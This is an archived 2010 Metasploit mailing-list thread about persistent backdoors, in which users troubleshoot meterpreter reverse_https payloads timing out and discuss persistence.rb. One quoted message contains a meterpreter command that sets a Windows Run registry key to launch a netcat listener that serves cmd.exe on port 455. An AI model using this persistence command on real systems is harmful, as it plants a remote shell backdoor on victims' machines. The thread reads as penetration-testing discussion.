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Re: Persistent Backdoor

From: Sherif El-Deeb <archeldeeb () gmail com>
Date: Sun, 10 Oct 2010 19:39:15 +0300

Same behavior with REV_HTTPS here, it is not working anymore with XP, Vista
and 7 "x86", no AV.
sorry for going off topic...
Sherif Eldeeb.

On Sun, Oct 10, 2010 at 5:52 PM, Miguel Rios <miguelrios35 () yahoo com> wrote:


Yeah I noticed the same behavior with reverse_https lately, which is why
I'm using reverse_tcp for now. Reverse_https used to work very well but now
I also get the timeout issue after it starts sending the initial stage.
Sorry I can't really help. I can only confirm I'm getting the same issue
with that payload, independently if its persistent or not.


--- On *Sat, 10/9/10, Tom Van de Wiele <tom.vandewiele () gmail com>* wrote:

From: Tom Van de Wiele <tom.vandewiele () gmail com>
Subject: Re: [framework] Persistent Backdoor
To: "framework" <framework () spool metasploit com>
Date: Saturday, October 9, 2010, 9:09 PM


Sort of dropping into this thread, my apologies. Persistence.rb is really
recommended instead of setting regkeys individually. Unless the victim has
checks for the regkeys set by persistence.rb ofcourse. I have a little issue
with it, in that it runs great with e.g. a windows/meterpreter/reverse_tcp payload
but has anyone experienced problems with running it with a
windows/meterpreter/reverse_https payload? I'm doing a file format client
directed attack with another box as an exploit/multi/handler and on that box
I see the reverse connection coming in from the victim to my multi/handler.
I see a tcp handshake being performed but then no data being sent by the
victim. After which the connection times out. I'm using reverse_https with
443/tcp as the client connecting back has to traverse a proxy server. I have
tried this in another testlab with no proxy server in between (2 machines
sitting in the same lan) but I get the same behavior. Using ruby1.9.1 and
build svn r10585 from 2 days ago.

Thank you for sharing your experiences or any pointers on how I can
diagnose this further.

On Mon, Oct 4, 2010 at 3:40 PM, David Kennedy <kennedyd013 () gmail com<http://mc/compose?to=kennedyd013 () gmail com>

Why not use run persistence from meterpreter?
On Oct 4, 2010 9:36 AM, "Eric" <dkn4a1 () gmail com<http://mc/compose?to=dkn4a1 () gmail com>>

meterpreter > reg setval -k
HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d
"C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe"
meterpreter > reg setval -k
HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d
"C:\\windows\\system32\\nc.exe -Ldp 455 -e cmd.exe"

doesn't seem to work for me :-(


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